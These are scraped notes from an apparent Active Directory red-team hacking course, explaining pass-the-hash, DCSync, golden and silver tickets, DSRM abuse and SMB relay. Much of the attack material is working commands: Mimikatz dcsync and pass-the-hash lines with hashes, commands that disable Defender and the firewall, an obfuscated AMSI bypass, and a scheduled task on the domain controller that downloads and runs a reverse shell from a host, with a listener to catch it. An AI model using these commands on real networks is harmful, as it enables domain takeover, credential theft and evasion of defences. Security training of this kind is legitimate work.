Active Directory Pentesting Full Course - Red Team Hacking

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

winpeas (Winpeas has watson embedded)

Github repos of exploits:

• https://github.com/nomi-sec/PoC-in-GitHub

• https://github.com/abatchy17/WindowsExploits

• https://github.com/SecWiki/windows-kernel-exploits

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

PS C:\AD> Import-Module .\Sherlock.ps1

PS C:\AD> Find-AllVulns

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

#change directory to where Jaws is located

cd c:\ad

#Run from CMD:

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

#Manually Search

schtasks /query /fo LIST 2>nul | findstr TaskName

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

schtasks /query /fo LIST /v > C:\Users\student1\Desktop\task.txt

#Edit the file executed by Administrator

net user /add rabakuku Password123

net localgroup administrators rabakuku /add

#reboot

#open cmd

shutdown /r /f

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Recommended Windows Hack The Box machines to Practice Privilege Escalation

Regretably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation. I found the following machines helpful for practicing priv esc (read, not your typical privilege escalation).

• Chatterbox

• Jeeves

• Access

• Active

• SecNotes

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Good Read:

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0

https://github.com/sense-of-security/ADRecon

.\ADRecon.ps1 -OutputType HTML

Download Bloodhound GUI

https://github.com/BloodHoundAD/BloodHound/releases

Download and install Java

https://www.java.com/en/download/

Download JDK

https://jdk.java.net/archive/

setx -m JAVA_HOME "C:\AD\Bloodhound\jdk-11.0.9"

Download Neoj4

https://neo4j.com/download-center/#community

neo4j.bat install-service

neo4j-admin set-initial-password yourpasswordhere

neo4j.bat start

neo4j.bat stop

Download SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

powershell -ep bypass

import-module .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting

BloodHound Website

https://bloodhound.readthedocs.io/en/latest/index.html

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. PtH attacks exploit the authentication protocol, as the passwords hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system’s active memory and other techniques.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources.

One primary difference between pass-the-hash and pass-the-ticket, is that Kerberos TGT tickets expire (10 hours by default) whereas NTLM hashes only change when the user changes their password. So a TGT ticket must be used within its lifetime, or it can be renewed for a longer period of time (7 days).   

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

#Download Inveigh here:

https://github.com/Kevin-Robertson/InveighZero

The SMB Relay attack abuses the NTLM challenge-response protocol.

all SMB sessions used the NTML protocol for encryption and authentication purposes (i.e. NTLM over SMB).

However, most sysadmins switched to KILE over SMB after research proved that the first version of NTLM is susceptible to Man-in-the-Middle attacks,

the SMB Relay attack counting among them.

#Download Inveigh here:

https://github.com/Kevin-Robertson/InveighZero

#Run Inveigh.exe as Admin

Inveigh.exe

#Send password offline for cracking

hashcat -m 5600 hadams.txt rockyou.txt

-m = hash module

hadams.txt = File containing the hash

rockyou.txt = the wordlist

https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/

https://book.hacktricks.xyz/windows/stealing-credentials

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

More on ACL:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It's created automatically when a new domain is created. It cannot be deleted. its name cannot be changed. it cannot be enabled.

KDC service handles all Kerberos ticket requests so KRBTGT account in AD plays a key role that encrypts and sign all Kerberos tickets for the domain.

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

The KRBTGT is a local default account that acts as a service account for the Key Distribution Center (KDC) service. It's created automatically when a new domain is created. It cannot be deleted. its name cannot be changed. it cannot be enabled.

KDC service handles all Kerberos ticket requests so KRBTGT account in AD plays a key role that encrypts and sign all Kerberos tickets for the domain.

Get-ForestGlobalCatalog

Get-DomainUser -Name student1

#Get the object ACL for the pentesting.local forest

Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs

#Get the object ACL matching ObjectAceType = DS-Replication for the pentesting.local forest

Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*')

#Get the object ACL matching ObjectAceType = DS-Replication and SecurityIdentifier for my current user =  for the pentesting.local forest

Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }

#Get the all the ACL in the pentesting.local forest for my current SecurityIdentifier

Get-ObjectACL "DC=pentesting,DC=local" -ResolveGUIDs | ? { ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }

#dump the commands for administrator

invoke-mimikatz -Command '"lsadump::dcsync /user:pentesting\administrator"'

#pass the hash to become the administrator

Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain: /ntlm: /run:powershell.exe"'

#see if we are administrator

invoke-command -ComputerName dc.pentesting.local -ScriptBlock{whoami;hostname}

#enter powershell session for the dc as the administrator

Enter-PSSession -ComputerName dc.pentesting.local

hostname

whoami

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Kerberos constrained delegation was introduced in Windows Server 2003 to provide a safer form of delegation that could be used by services.

When it is configured, constrained delegation restricts the services to which the specified server can act on the behalf of a user.

This requires domain administrator privileges to configure a domain account for a service and is restricts the account to a single domain.

In today's enterprise, front-end services are not designed to be limited to integration with only services in their domain.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

You need to have GenericAll or GenericWrite to set the SPN

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message.

This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

DSRM is Directory Services Restore Mode.

There is a local administrator on every DC called "Administrator" whose password is the DSRM password.

DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.

After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.

---------------------------------------------------------------

DSRM is Directory Services Restore Mode.

There is a local administrator on every DC called "Administrator" whose password is the DSRM password.

DSRM password (SafeModePassword) is required when a server is promoted to Domain Controller and it is rarely changed.

After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the DC.

#From the Domain Admin Powershell Permission

#Create Session

$sess = New-PSSession -ComputerName dc

#Disable Firewall and AV

Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess

Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess

Invoke-Command -Session $sess -FilePath c:\AD\Tools\Invoke-mimikatz.ps1

#ByPass AMSI

powershell -ep bypass

SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

#Enter Session

Enter-PSSession $sess

#Enter New KeyReg

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

#If KeyReg Exist:

#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

#If DsrmAdminLogonBehavior is not set to 2

Set-ItemProperty -Name "DsrmAdminLogonBehavior" -Value 2

#Get-ItemProperty to see if DsrmAdminLogonBehavior is set to 2

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"

#Compare the Administrator hash with the Administrator hash of below command

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dc

#Dump DSRM password (needs DA privs) to be used for the command below

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc

---

#Use below command to pass the hash. Use the hash from the above command

#Needs to be excute from another powershell windows with local admin

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

#Session

$sess = New-PSSession -ComputerName dc

Enter-PSSession $sess

#or

ls \\dcorp-dc\c$

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

It simulates the behavior of a Domain Controller (using protocols like RPC used only by DC) to inject its own data, bypassing most of the common security controls and including your SIEM. It shares some similarities with the DCSync attack (already present in the lsadump module of mimikatz).

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Domain Admins is the AD group that most people think of when discussing Active Directory administration. This group has full admin rights by default on all domain-joined servers and workstations, Domain Controllers, and Active Directory. It gains admin rights on domain-joined computers since when these systems are joined to AD, the Domain Admins group is added to the computer’s Administrators group.

Enterprise Admins is a group in the forest root domain that has full AD rights to every domain in the AD forest. It is granted this right through membership in the Administrators group in every domain in the forest.

SID History is an attribute that supports migration scenarios. Every user account has an associated Security IDentifier (SID) which is used to track the security principal and the access the account has when connecting to resources. SID History enables access for another account to effectively be cloned to another. This is extremely useful to ensure users retain access when moved (migrated) from one domain to another. Since the user’s SID changes when the new account is created, the old SID needs to map to the new one. When a user in Domain A is migrated to Domain B, a new user account is created in DomainB and DomainA user’s SID is added to DomainB’s user account’s SID History attribute. This ensures that DomainB user can still access resources in DomainA.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

It simulates the behavior of a Domain Controller (using protocols like RPC used only by DC) to inject its own data, bypassing most of the common security controls and including your SIEM. It shares some similarities with the DCSync attack (already present in the lsadump module of mimikatz).

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service. The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain. With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker is controlling the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), then he has the golden ticket to access any resource on the domain.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

. .\powerview

Get-DomainSID

S-1-5-21-1070240333-336889418-1185445934

#run dcsync to get administrator's HASH

. .\invoke-mimikatz

invoke-mimikatz -Command '"lsadump::dcsync /user:pentesting\administrator"'

#Create Silver ticker for HOST

Invoke-Mimikatz -Command '"kerberos::golden /domain:pentesting.local /sid:S-1-5-21-1070240333-336889418-1185445934 /target:dc.pentesting.local /service:HOST /rc4:2b576acbe6bcfda7294d6bd18041b8fe /user:Administrator /ptt"'

#List the current ticket

klist

#See if you have access

schtasks /s dc.pentesting.local

#edit Invoke-PowerShellTcp.ps1 or Invoke-PowerShellTcpOneLine.ps1

#Download it from here: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

#add the following at the end of the file

Invoke-PowerShellTcp -Reverse -IPAddress <localIP> -Port 443

#Host the edited Invoke-PowerShellTcp.ps1 with HFS:

https://www.rejetto.com/hfs/?f=dl

#listen with Powercat

powercat -l -v -p 4444 -t 1000

#Schedule a task

schtasks /create /S dc.pentesting.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.1.55/Invoke-PowerShellTcpOneLine.ps1''')'"

#Run The task

schtasks /Run /S dc.pentesting.local  /TN "STCheck"

#Extra

#Using hash of the Domain Controller computer account, below

#command provides access to shares on the DC.

Invoke-Mimikatz -Command '"kerberos::golden /domain:pentesting.local /sid:S-1-5-21-1070240333-336889418-1185445934 /target:pentesting.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'

#Similar command can be used for any other service on a machine.

Which services? SPN: HOST, RPCSS, WSMAN and many more.

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main

The commands executed can be found here:

https://github.com/rabakuku/Udemy-Red-Team-Hacking-Course/tree/main